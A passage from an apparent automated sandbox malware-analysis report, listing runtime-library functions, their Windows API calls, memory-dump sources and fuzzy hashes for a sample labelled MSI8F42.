                                                                                                                                            • Instruction Fuzzy Hash: 06E04F3250863CBBCF232F61FC09EAE3E2AFF44750F004410FC0565120CB318920AAD5
                                                                                                                                            Function 0031E270 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
                                                                                                                                            • Instruction ID: 65aba4ea3aebb361ca7a1a9c2aa63b92b4fcf30608ac4ccc202f417fd83555a2
                                                                                                                                            • Opcode Fuzzy Hash: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
                                                                                                                                            • Instruction Fuzzy Hash: 55F14075E002199FDF19CFA9C8806EDB7B2FF98324F158269E815AB381D731AD45CB90
                                                                                                                                            Function 0031A587 Relevance: 2.8, Strings: 2, Instructions: 344COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 0$T4
                                                                                                                                            • API String ID: 0-1950495336
                                                                                                                                            • Opcode ID: 2d14d0593c8bf20a78536a61d55c6a89b264af23dfa17ac273d358957222f415
                                                                                                                                            • Instruction ID: 5547f3f05d713e1cddf97242b14268699e6c5d267f0830a1f4fc709ec3e29c75
                                                                                                                                            • Opcode Fuzzy Hash: 2d14d0593c8bf20a78536a61d55c6a89b264af23dfa17ac273d358957222f415
                                                                                                                                            • Instruction Fuzzy Hash: A3C1D170502A068FCB2ECF68C4906FEBBB6BF4D312F154619D4969B691C730ADC6CB52
                                                                                                                                            Function 00327B1F Relevance: 1.9, APIs: 1, Instructions: 408timeCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00327F64,00000000,00000000,00000000), ref: 00327E23
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InformationTimeZone
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 565725191-0
                                                                                                                                            • Opcode ID: c3d3fac8d7538b3b8b8ef564db94b4ca7f0a4e3fb8bdba15e9f164fc4dfe5a19
                                                                                                                                            • Instruction ID: f86f11ed5edd5df2ef3bc7b5f832d9e0223d908c779cc61c9c9358c8fa32899a
                                                                                                                                            • Opcode Fuzzy Hash: c3d3fac8d7538b3b8b8ef564db94b4ca7f0a4e3fb8bdba15e9f164fc4dfe5a19
                                                                                                                                            • Instruction Fuzzy Hash: B7C10576D04235ABDB27AB64EC02ABEB7B8FF05750F154056F901AF291EB309E41C790
                                                                                                                                            Function 003284BD Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,003284B8,?,?,00000008,?,?,003314E4,00000000), ref: 003286EA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionRaise
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3997070919-0
                                                                                                                                            • Opcode ID: 3efc00e6b9a6aca9350bf2dc0d863905dad09e02b6fcd51742866c9f5e73bfe0
                                                                                                                                            • Instruction ID: aea2733090cf97dba55b0effcef64d0b97141157ca28f95bebb59d4340cd3950
                                                                                                                                            • Opcode Fuzzy Hash: 3efc00e6b9a6aca9350bf2dc0d863905dad09e02b6fcd51742866c9f5e73bfe0
                                                                                                                                            • Instruction Fuzzy Hash: 33B16C31211618CFD716CF2CD48AB647BE0FF45364F268658E99ACF2A1CB35E992CB40
                                                                                                                                            Function 003135A9 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 003135BF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2325560087-0
                                                                                                                                            • Opcode ID: 42015d27a87b2c9f181f8e0b1c5133047eb5dbe43e0ae6802e4681d291f652e2
                                                                                                                                            • Instruction ID: f4c91c5dc3801c319202fc326e7296b83ae98c0fa59cd1cd72cdb7478b44a6ee
                                                                                                                                            • Opcode Fuzzy Hash: 42015d27a87b2c9f181f8e0b1c5133047eb5dbe43e0ae6802e4681d291f652e2
                                                                                                                                            • Instruction Fuzzy Hash: 2F519CB5E11205CBEB1ACF58D8857AABBF4FB09354F15806AD405EB3A0D774AE40CF90
                                                                                                                                            Function 0032AF79 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6c050c2ad554b515170f4c6be9458e7a4f9bc5f579ddb2b7128b275b97657b96
                                                                                                                                            • Instruction ID: e882a9a1bd8a2b7228e2d5942d24f366451940bbed3560ff892b2571ddbf7a66
                                                                                                                                            • Opcode Fuzzy Hash: 6c050c2ad554b515170f4c6be9458e7a4f9bc5f579ddb2b7128b275b97657b96
                                                                                                                                            • Instruction Fuzzy Hash: 3231E472900629AFCB21DFA9DC89DBBB76DEB84310F158158F81597240EA30AE408B60
                                                                                                                                            Function 0032E48A Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 003257CC: GetLastError.KERNEL32(?,00000008,0032AD4C,?,?,?,?,00000000,?,?), ref: 003257D0
                                                                                                                                              • Part of subcall function 003257CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00325872
                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0032E4DE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$InfoLocale
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3736152602-0
                                                                                                                                            • Opcode ID: 9c23fc0df5d60eb9c00bbedb58c1b03951e87c9af06b53369e138d4235090d6a
                                                                                                                                            • Instruction ID: 2a630eef3a40b26e1bc02e45573bc512159e43e672d9df14ee60a73db51c35b4
                                                                                                                                            • Opcode Fuzzy Hash: 9c23fc0df5d60eb9c00bbedb58c1b03951e87c9af06b53369e138d4235090d6a
                                                                                                                                            • Instruction Fuzzy Hash: E2219572664216ABDB2A9F29EC42ABA73ACEF05714F240079F905DA141FB74ED40C750
                                                                                                                                            Function 0032E6B9 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 003257CC: GetLastError.KERNEL32(?,00000008,0032AD4C,?,?,?,?,00000000,?,?), ref: 003257D0
                                                                                                                                              • Part of subcall function 003257CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00325872
                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0032E453,00000000,00000000,?), ref: 0032E6E5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$InfoLocale
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3736152602-0
                                                                                                                                            • Opcode ID: 2de1bd23f7be0c7df9d2dfe65538f3b003717b7432507fe7fe0272780f06ae3d
                                                                                                                                            • Instruction ID: 8af53e27b7073bc52c90dc8c72f459388f0b357af1530adf830b8543d3ee9fe2
                                                                                                                                            • Opcode Fuzzy Hash: 2de1bd23f7be0c7df9d2dfe65538f3b003717b7432507fe7fe0272780f06ae3d
                                                                                                                                            • Instruction Fuzzy Hash: B7F0CD36A00232BBDB2A5768DC47BFA776CEB40754F150824EC16A7180EA74FD41D6A0
                                                                                                                                            Function 0032E1AC Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 003257CC: GetLastError.KERNEL32(?,00000008,0032AD4C,?,?,?,?,00000000,?,?), ref: 003257D0
                                                                                                                                              • Part of subcall function 003257CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00325872
                                                                                                                                            • EnumSystemLocalesW.KERNEL32(0032E48A,00000001,?,?,-00000050,?,0032E82C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0032E1F6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                            • Opcode ID: 2fb33c6e32cefbaf6f3f51a8b8589943d807533bb7e41ab1ea15bf143b4931b8
                                                                                                                                            • Instruction ID: 8acca41708e64863e697a175eb6f1a1809a5812d6640d6c12efb62df44351a1a
                                                                                                                                            • Opcode Fuzzy Hash: 2fb33c6e32cefbaf6f3f51a8b8589943d807533bb7e41ab1ea15bf143b4931b8
                                                                                                                                            • Instruction Fuzzy Hash: 3EF02B363003149FDB266F39EC86A7A7B99FF80768F05443DF9068B690D6B1AC42DB50
                                                                                                                                            Function 00327132 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00321C9A: EnterCriticalSection.KERNEL32(-0034DE50,?,00323576,?,0034A078,0000000C,00323841,?), ref: 00321CA9
                                                                                                                                            • EnumSystemLocalesW.KERNEL32(00327125,00000001,0034A1D8,0000000C,00327554,00000000), ref: 0032716A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1272433827-0
                                                                                                                                            • Opcode ID: 1720937ecf220234aaceabb5c69c62066d01b3f380d71890ade4984b5e3a65f1
                                                                                                                                            • Instruction ID: ea7d48a8ad73428f381edb0683cf9412f38824c75acc0a566db07a081b541201
                                                                                                                                            • Opcode Fuzzy Hash: 1720937ecf220234aaceabb5c69c62066d01b3f380d71890ade4984b5e3a65f1
                                                                                                                                            • Instruction Fuzzy Hash: D3F04976A54220EFD706DF98E846B9D77F0FB49726F10455AF410DF2A0DB75A9008F40
                                                                                                                                            Function 0032E0C6 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 003257CC: GetLastError.KERNEL32(?,00000008,0032AD4C,?,?,?,?,00000000,?,?), ref: 003257D0
                                                                                                                                              • Part of subcall function 003257CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00325872
                                                                                                                                            • EnumSystemLocalesW.KERNEL32(0032E01F,00000001,?,?,?,0032E88A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0032E0FD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                            • Opcode ID: 2e22ae69f07e1343bb05d6713cf4a63add18a5a8972f59ee8b1227059b0d9dee
                                                                                                                                            • Instruction ID: 23d0a46322673e96324ff80cba2f03a850e4e19ce58090ff942dd7e80dc772e2
                                                                                                                                            • Opcode Fuzzy Hash: 2e22ae69f07e1343bb05d6713cf4a63add18a5a8972f59ee8b1227059b0d9dee
                                                                                                                                            • Instruction Fuzzy Hash: B8F02B3A30031597CB16AF3AEC466AA7F95EFC1B61F074068EE058F651C6B29983D790
                                                                                                                                            Function 003123F8 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,003100E2,00000000,00000000,00000004,0030ED14,00000000,00000004,0030F127,00000000,00000000), ref: 00312410
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoLocale
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                            • Opcode ID: 33e2d8a0827c994d96ae3fbb244ba57e51ef77df58ed2eef20480b6bc3312222
                                                                                                                                            • Instruction ID: 0af6b0d28724efc633a6661f11386d678f132b77ec12f5dcd15ba7d06682f4e8
                                                                                                                                            • Opcode Fuzzy Hash: 33e2d8a0827c994d96ae3fbb244ba57e51ef77df58ed2eef20480b6bc3312222
                                                                                                                                            • Instruction Fuzzy Hash: DCE0D832654114BAE71B4B79AF0FFFB76ACD70470AF904151E902D40D1DEA1CA50E161
                                                                                                                                            Function 0031353F Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0002354B,00313077), ref: 00313544
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                            • Opcode ID: 5b5c4bc2b33169f109d1eb6f38f14bba0afe026340ea5a768752b96d7e4d3cc2
                                                                                                                                            • Instruction ID: 84358c19aa5f5e3d3b8ca01ecd8d4b9d1bb28bd255f5a0d75a39c764a781f62e
                                                                                                                                            • Opcode Fuzzy Hash: 5b5c4bc2b33169f109d1eb6f38f14bba0afe026340ea5a768752b96d7e4d3cc2
                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                            Function 00320A48 Relevance: .7, Instructions: 655COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                            • Opcode ID: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
                                                                                                                                            • Instruction ID: 782961531f5c99354a4e96f4c885e16cf0f9807b4098d3722cc59f0a28c4fb07
                                                                                                                                            • Opcode Fuzzy Hash: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
                                                                                                                                            • Instruction Fuzzy Hash: D132C074A0022ADFCF29CF98D981ABEB7B5EF54304F154168DC41AB356D732AE46CB80
                                                                                                                                            Function 003292A9 Relevance: .6, Instructions: 637COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 49a60150ad51e7c0472a47ef6e2a451a719bd1eaf2b32fd00a3c3750326f20c8
                                                                                                                                            • Instruction ID: 4ac5e5e6f40e7bed7ecf1a57d0cc12340e244a8886e8dc357c3bd2582a46d02d
                                                                                                                                            • Opcode Fuzzy Hash: 49a60150ad51e7c0472a47ef6e2a451a719bd1eaf2b32fd00a3c3750326f20c8
                                                                                                                                            • Instruction Fuzzy Hash: E932F331D29F514ED7239638DC62339A28CAFB73D4F15D727F81AB5AA9EB29C4834100
                                                                                                                                            Function 0031A915 Relevance: .4, Instructions: 388COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: ababd327e87d22df91d4c621fc2dfb16225bb376556aa8a1761dfcaf93ef7fa7
                                                                                                                                            • Instruction ID: 767777913bb59f874cf6dacc355decbc9bd960c9a8c2227b36e808f60b83d3ee
                                                                                                                                            • Opcode Fuzzy Hash: ababd327e87d22df91d4c621fc2dfb16225bb376556aa8a1761dfcaf93ef7fa7
                                                                                                                                            • Instruction Fuzzy Hash: E2E19F70602A098FCB2ECF68C580AEAB7F1FF4D312F168659D4569B691D730ADC1CB52
                                                                                                                                            Function 0032D8D5 Relevance: .3, Instructions: 327COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
